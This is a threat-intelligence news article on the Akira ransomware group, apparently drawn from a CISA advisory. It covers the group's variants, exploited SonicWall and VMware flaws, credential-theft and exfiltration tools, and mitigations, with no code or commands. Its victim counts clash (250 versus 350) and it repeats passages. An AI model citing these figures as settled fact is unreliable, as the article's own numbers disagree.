Akira Ransomware’s Global Onslaught: Over 250 Organizations Targeted, $244 Million Extorted
The Akira ransomware group has emerged as a formidable cyber threat, orchestrating attacks on more than 250 organizations across North America, Europe, and Australia since its inception in March 2023. According to a recent advisory from the Cybersecurity and Infrastructure Security Agency (CISA), these operations have resulted in approximately $244.17 million in ransom payments as of late September 2025.
Origins and Evolution
Akira’s roots trace back to the now-defunct Conti ransomware group, suggesting a lineage of sophisticated cybercriminal activity. Initially, Akira’s operations were confined to Windows systems, utilizing a C++ variant that appended the .akira extension to encrypted files. However, by April 2023, the group expanded its arsenal to include a Linux variant targeting VMware ESXi virtual machines, reflecting a strategic shift towards disrupting virtualized environments. This evolution continued with the August 2023 introduction of the Megazord encryptor, a Rust-based tool that appends a .powerranges extension to encrypted files.
Targeted Sectors
Akira’s attacks have predominantly affected small and medium-sized businesses across various sectors, including manufacturing, education, information technology, healthcare, and financial services. This broad targeting underscores the group’s opportunistic approach, exploiting vulnerabilities wherever they may exist.
Attack Vectors and Techniques
The group’s initial access methods are notably aggressive. They exploit virtual private network (VPN) services lacking multi-factor authentication (MFA) and known vulnerabilities in Cisco products. A particularly concerning tactic involves exploiting CVE-2024-40766, a critical vulnerability in SonicWall’s SonicOS operating system. This flaw allows attackers to gain unauthorized administrative access to affected devices, facilitating data breaches and ransomware deployment. Despite the availability of patches since August 2024, many organizations have yet to secure their devices, leaving them exposed to active exploitation.
Technical Sophistication
Akira employs a hybrid encryption scheme combining the ChaCha20 stream cipher with RSA public-key cryptosystem, enabling efficient encryption of large datasets while maintaining secure key exchange. The ransomware’s Linux variant is specifically designed to exploit vulnerabilities in VMware environments, such as CVE-2024-37085, an authentication bypass vulnerability in VMware ESXi hypervisors. This allows attackers to gain administrative access via Active Directory misconfigurations. The malware includes commands to disable logging and prevent forensic analysis, enhancing its stealth capabilities.
Double Extortion and Persistence
Operating on a double-extortion model, Akira not only encrypts data but also threatens to leak sensitive information unless a ransom is paid. After gaining initial access, the group establishes persistence by creating new domain accounts and using credential-scraping tools like Mimikatz and LaZagne to harvest passwords. They leverage legitimate remote access tools such as AnyDesk and LogMeIn to maintain access while blending in with regular administrator activity. For data exfiltration, tools like FileZilla, WinSCP, and RClone are used to transfer stolen data to cloud storage services before encryption. To inhibit system recovery, the Akira encryptor uses PowerShell commands to delete Volume Shadow Copy Service copies on Windows systems.
Global Impact
The United States has been the most affected country, followed by Canada, the United Kingdom, and Germany. Since its inception, the group has claimed over 350 victims globally and extorted approximately $42 million USD as of April 2024. The ransomware employs a double-extortion strategy: it exfiltrates sensitive data before encrypting files. Victims are pressured to pay high ransoms under the threat of public data leaks on Akira’s Tor-hosted leak site. The site features a command-line interface where users can access stolen data through commands like leaks and download it via torrent links.
Mitigation Strategies
Organizations are urged to implement robust cybersecurity measures to defend against Akira’s tactics. Key recommendations include:
– Apply Patches Immediately: Update to the latest firmware versions provided by SonicWall and other vendors to address known vulnerabilities.
– Enforce Multi-Factor Authentication (MFA): Implement MFA across all access points to add an additional layer of security.
– Restrict Access: Limit management access to trusted IPs and disable WAN management from public internet sources.
– Monitor Networks: Continuously monitor for suspicious activity indicating potential exploitation attempts.
– Educate Employees: Conduct regular training sessions to raise awareness about phishing attacks and the importance of strong, unique passwords.
Conclusion
The Akira ransomware group’s activities highlight the evolving and persistent nature of cyber threats. Their ability to adapt and exploit vulnerabilities across various platforms and sectors underscores the critical need for organizations to remain vigilant and proactive in their cybersecurity efforts. By implementing comprehensive security measures and fostering a culture of awareness, businesses can better protect themselves against such sophisticated attacks.
